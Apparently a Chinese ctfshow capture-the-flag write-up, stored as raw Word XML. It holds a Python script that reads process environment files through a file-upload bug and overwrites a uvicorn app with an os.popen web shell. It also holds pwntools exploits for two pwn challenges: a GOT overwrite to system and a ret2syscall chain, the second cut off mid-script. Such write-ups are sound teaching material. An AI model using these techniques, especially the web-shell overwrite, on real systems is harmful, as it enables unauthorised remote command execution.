              <w:t># Author:ctfshow-h1xa</w:t>
              <w:br/>
              <w:br/>
              <w:t>def get_api():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    response = requests.get(url=url+"openapi.json")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if "FastAPI" in response.text:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        apijson = json.loads(response.text)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return apijson</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:br/>
              <w:t>def get_pwd():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    pwd = ''</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for pid in range(20):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        data = f'/proc/{pid}/environ'</w:t>
              <w:br/>
              <w:t xml:space="preserve">        file = upload(data)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        content = download(file['fileName'])</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if content['fileName'] and 'PWD' in content['fileContent']:</w:t>
              <w:br/>
              <w:t xml:space="preserve">            pwd = content['fileContent'][content['fileContent'].find("PWD=")+4:content['fileContent'].find("GPG_KEY=")]+'/'</w:t>
              <w:br/>
              <w:t xml:space="preserve">            break</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return pwd</w:t>
              <w:br/>
              <w:br/>
              <w:t>def get_python_file():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    python_file = ''</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for pid in range(20):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        data = f'/proc/{pid}/cmdline'</w:t>
              <w:br/>
              <w:t xml:space="preserve">        file = upload(data)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        content = download(file['fileName'])</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if content['fileName'] and 'uvicorn' in content['fileContent']:</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if 'reload' in content['fileContent']:</w:t>
              <w:br/>
              <w:t xml:space="preserve">                print("[√] 检测到存在reload参数，可以进行热部署")</w:t>
              <w:br/>
              <w:t xml:space="preserve">                python_file = content['fileContent'][content['fileContent'].find("uvicorn")+7:content['fileContent'].find(":")]+".py"</w:t>
              <w:br/>
              <w:t xml:space="preserve">                print(f"[√] 检测到主程序，{python_file}")</w:t>
              <w:br/>
              <w:t xml:space="preserve">                global app</w:t>
              <w:br/>
              <w:t xml:space="preserve">                app = content['fileContent'][content['fileContent'].find("uvicorn")+7+len(python_file)-3+1:content['fileContent'].find("--")]</w:t>
              <w:br/>
              <w:t xml:space="preserve">                print(f"[√] 检测到uvicorn的应用名，{app}")</w:t>
              <w:br/>
              <w:t xml:space="preserve">            else:</w:t>
              <w:br/>
              <w:t xml:space="preserve">                print("[x] 检测到无reload参数，无法热部署，程序结束")</w:t>
              <w:br/>
              <w:t xml:space="preserve">                exit()</w:t>
              <w:br/>
              <w:t xml:space="preserve">            break</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return python_file</w:t>
              <w:br/>
              <w:br/>
              <w:t>def new_file():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    global app</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return f'''</w:t>
              <w:br/>
              <w:t>import uvicorn,os</w:t>
              <w:br/>
              <w:t>from fastapi import *</w:t>
              <w:br/>
              <w:t>{app} = FastAPI()</w:t>
              <w:br/>
              <w:br/>
              <w:t>@{app}.get("/s")</w:t>
              <w:br/>
              <w:t>def s(c):</w:t>
              <w:br/>
              <w:t xml:space="preserve">  os.popen(c)</w:t>
              <w:br/>
              <w:t>'''.replace("\x00","")</w:t>
              <w:br/>
              <w:br/>
              <w:t>def get_shell(name):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    name = name.replace("\x00","")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    response = requests.post(</w:t>
              <w:br/>
              <w:t xml:space="preserve">            url=url+"upload/",</w:t>
              <w:br/>
              <w:t xml:space="preserve">            files={"file":(name, new_file())}</w:t>
              <w:br/>
              <w:t xml:space="preserve">        )</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if 'fileName' in response.text:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print(f"[√] 上传成功，等待5秒重载主程序 ")</w:t>
              <w:br/>
              <w:t xml:space="preserve">        for i in range(5):</w:t>
              <w:br/>
              <w:t xml:space="preserve">            time.sleep(1)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            print("[√] "+str(5-i)+" 秒后验证重载")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    else:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print("[x] 主程序重写失败，程序退出")</w:t>
              <w:br/>
              <w:t xml:space="preserve">        exit()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    try:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        response = requests.get(url=url+'s/?c=whoami', timeout=3)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    except:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print("[x] 主程序重载失败，程序退出")</w:t>
              <w:br/>
              <w:t xml:space="preserve">        exit()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if response.status_code == 200:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print(f"[√] 恭喜，getshell成功 路径为{url}s/ ")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    else:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print("[x] 主程序重载失败，程序退出")</w:t>
              <w:br/>
              <w:t xml:space="preserve">        exit()</w:t>
              <w:br/>
              <w:br/>
              <w:t>def upload(name):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    f = io.BytesIO(b'a' * 100)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    response = requests.post(</w:t>
              <w:br/>
              <w:t xml:space="preserve">            url=url+"upload/",</w:t>
              <w:br/>
              <w:t xml:space="preserve">            files={"file":(name, f)}</w:t>
              <w:br/>
              <w:t xml:space="preserve">        )</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if 'fileName' in response.text:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        data = json.loads(response.text)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return data</w:t>
              <w:br/>
              <w:t xml:space="preserve">    else:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return {'fileName':''}</w:t>
              <w:br/>
              <w:br/>
              <w:t>def download(file):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    response = requests.get(url=url+"uploads/"+file)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if 'fileName' in response.text:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        data = json.loads(response.text)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return data</w:t>
              <w:br/>
              <w:t xml:space="preserve">    else:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return {'fileName':''}</w:t>
              <w:br/>
              <w:br/>
              <w:t>def main():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    print("[√] 开始读取openapi.json")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    apijson = get_api()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    print("[√] 开放api有")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    print(*apijson['paths'])</w:t>
              <w:br/>
              <w:t xml:space="preserve">    print("[√] 开始读取运行目录")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    pwd = get_pwd()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if pwd:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print(f"[√] 运行目录读取成功 路径为{pwd}")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    else:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print("[x] 运行路径读取失败，程序退出")</w:t>
              <w:br/>
              <w:t xml:space="preserve">        exit()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    python_file = get_python_file()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if python_file:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print(f"[√] uvicorn主文件读取成功 路径为{pwd}{python_file}")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    else:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print("[x] uvicorn主文件读取失败，程序退出")</w:t>
              <w:br/>
              <w:t xml:space="preserve">        exit()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    get_shell(pwd+python_file)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PWN部分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pwn1 Badboy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Badboy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Zz_Zz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坏男孩的心思你不懂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100分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一、环境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libc版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GNU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> C Library (Ubuntu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GLIBC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.27-3ubuntu1.6) stable release version 2.27.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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：pwn01链接的靶机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题目描述：坏男孩的心思你不懂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二、程序保护情况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ctfshow@ubuntu:~/BadBoy-2$ checksec BadBoy-2</w:t>
              <w:br/>
              <w:t>[*] '/home/ctfshow/BadBoy-2/BadBoy-2'</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Arch:     amd64-64-little</w:t>
              <w:br/>
              <w:t xml:space="preserve">    RELRO:    Partial RELRO</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Stack:    Canary found</w:t>
              <w:br/>
              <w:t xml:space="preserve">    NX:       NX enabled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PIE:      No PIE (0x400000)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三、解题过程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sz w:val="22"/>
        </w:rPr>
        <w:t>ida</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>查看程序反编译代码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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>变量，发现是全局变量，且初始值为6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62550" cy="752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while循环语句里，读取%ld的数字，存储到无符号的变量v4，并使用write打印</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>长度的buf+v4的内容，输出完毕后将kl值减3，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因此while语句可以执行两次，第一次打印的长度为6，第二次打印的长度为3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利用两次打印，通过数组溢出，实现stack地址和libc地址末3字节的泄露。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14800" cy="30194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由于v5值不能大于8，打算通过输入负数，通过数组溢出，实现puts.got表的更改，更改为system函数地址。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buf的内容只允许输入3个字符，无法输入"/bin/sh\x00"，因此直接输入"sh\x00"获取shell。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[Badboy-2视频解说.mp4]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exp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pwn import *</w:t>
              <w:br/>
              <w:br/>
              <w:t>context(log_level='debug',arch='amd64',os='linux')</w:t>
              <w:br/>
              <w:br/>
              <w:t>filename = "./BadBoy-2"</w:t>
              <w:br/>
              <w:t>io = process(filename)</w:t>
              <w:br/>
              <w:t>elf = ELF(filename)</w:t>
              <w:br/>
              <w:t>libc = elf.libc</w:t>
              <w:br/>
              <w:br/>
              <w:t>#gdb.attach(io,"b *0x400987")</w:t>
              <w:br/>
              <w:br/>
              <w:t>payload = "40"</w:t>
              <w:br/>
              <w:t>io.sendlineafter("i am bad boy \n",payload)</w:t>
              <w:br/>
              <w:t>stack_addr = u64(io.recv(6).ljust(8,b'\x00'))</w:t>
              <w:br/>
              <w:t>print("stack_addr:" + hex(stack_addr))</w:t>
              <w:br/>
              <w:br/>
              <w:br/>
              <w:t>payload = "24"</w:t>
              <w:br/>
              <w:t>io.sendlineafter("i am bad boy \n",payload)</w:t>
              <w:br/>
              <w:t>libc_start_call_main = u64(io.recv(3).ljust(8,b'\x00'))</w:t>
              <w:br/>
              <w:t>print("libc_start_call_main:" + hex(libc_start_call_main))</w:t>
              <w:br/>
              <w:br/>
              <w:t>payload = b'sh\x00'</w:t>
              <w:br/>
              <w:t>io.sendafter("because i'm not girl ",payload)</w:t>
              <w:br/>
              <w:br/>
              <w:t>puts_got_index = -(stack_addr - 0xf8  - 0x601018)</w:t>
              <w:br/>
              <w:br/>
              <w:t>print("puts_got_index:" + hex(puts_got_index))</w:t>
              <w:br/>
              <w:br/>
              <w:t>payload = str(puts_got_index)</w:t>
              <w:br/>
              <w:t>io.sendlineafter("so can you fell me? ",payload)</w:t>
              <w:br/>
              <w:br/>
              <w:t>system_addr = libc_start_call_main - 0x21c87 + libc.sym['system']</w:t>
              <w:br/>
              <w:t>payload = p64(system_addr)</w:t>
              <w:br/>
              <w:t>io.sendafter("HaHaHa ",payload)</w:t>
              <w:br/>
              <w:br/>
              <w:t>io.interactive()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pwn2 s.s.a.l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s.s.a.l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Zz_Zz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200分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一、环境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libc版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GNU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> C Library (Ubuntu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GLIBC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.27-3ubuntu1.6) stable release version 2.27.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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：pwn01链接的靶机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题目描述：这个程序怎么一个输出函数都没有？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二、程序保护情况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ctfshow@ubuntu:~/s.s.a.l$ checksec s.s.a.l</w:t>
              <w:br/>
              <w:t>[*] '/home/ctfshow/s.s.a.l/s.s.a.l'</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Arch:     amd64-64-little</w:t>
              <w:br/>
              <w:t xml:space="preserve">    RELRO:    Partial RELRO</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Stack:    No canary found</w:t>
              <w:br/>
              <w:t xml:space="preserve">    NX:       NX enabled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PIE:      No PIE (0x400000)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三、解题过程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首先使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ida</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>查看反编译代码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存在读入0x50长度到v4中，但无溢出现象。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查看zz_zz函数，发现是一些初始化函数，其中有几句是获取随机数的代码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2371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接着查看Zz_Zz_955函数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05350" cy="5619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v5是一段乱序的"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"字符串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其次程序开始接收seed的数字(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&amp;unk_400984是“%d”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)，然后将seed作为随机数种子使用。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接着是一个do-while语句，一共会执行7次循环。作用是将v5的内容作为随机存储在全局变量d中。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然后读取0x58的内容到v5中，这里存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>栈溢出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接着观察程序其它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>指令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，发现存在部分无法反编译的指令。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看到syscall，可以尝试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ret2syscall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>进行操作。尝试构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>rax=0x3b、rdi="/bin/sh"、rsi=0、rdx=0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由于C语言的随机是伪随机，因此需要找到一个种子数，使得全局变量d中存储的内容就是"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"。同时从前面可以看出，zz_zz函数的返回值是由随机数来决定的，因此编写下面C语言代码，找到种子数。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48225" cy="17049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得到当种子数为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>370424</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>时，符合我们的要求，因此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>rdi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rax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>构造完毕。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程序存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pop rsi;ret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，因此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>rsi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>也很好构造。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当程序执行完</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>rand()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>操作后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>rdx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的值不为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。但结合前面得到的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>指令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sar rdx,14h</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>xor rdx,[rsp+8]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可以构造出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>rdx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>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通过多次执行，发现rdx的值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>0x503d0e0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48175" cy="23050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执行完</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>sar rdx,14h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>指令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>rdx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>0x50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因此在栈空间处布置内容为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>0x50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>运算之后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>rdx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的值即为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，因此得到shell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[s.s.a.l视频解说.mp4]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exp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pwn import *</w:t>
              <w:br/>
              <w:br/>
              <w:t>context(log_level='debug',arch='amd64',os='linux')</w:t>
              <w:br/>
              <w:br/>
              <w:t>filename = "./s.s.a.l"</w:t>
              <w:br/>
              <w:t>io = process(filename)</w:t>
              <w:br/>
              <w:t>elf = ELF(filename)</w:t>
              <w:br/>
              <w:t>libc = elf.libc</w:t>
              <w:br/>
              <w:br/>
              <w:t>gdb.attach(io,"b *0x4008cd")</w:t>
              <w:br/>
              <w:br/>
              <w:t>rdx_value = 0x50</w:t>
              <w:br/>
              <w:t>payload = flat([cyclic(32)])</w:t>
              <w:br/>
              <w:t>payload += p64(rdx_value)*3</w:t>
              <w:br/>
              <w:t>io.send(payload)</w:t>
              <w:br/>
              <w:br/>
              <w:t>pause()</w:t>
              <w:br/>
              <w:br/>
              <w:t>payload = "370424"</w:t>
              <w:br/>
              <w:t>io.sendline(payload)</w:t>
              <w:br/>
              <w:br/>
              <w:br/>
              <w:t>zz955 = 0x400802</w:t>
              <w:br/>
              <w:t>pop_rsi_rdi_ret = 0x400831</w:t>
              <w:br/>
              <w:t>syscall = 0x400760</w:t>
              <w:br/>
              <w:t>xor_rdx = 0x400834</w:t>
              <w:br/>
              <w:t xml:space="preserve">bss = 0x601090        </w:t>
              <w:br/>
              <w:br/>
              <w:t>pause()</w:t>
              <w:br/>
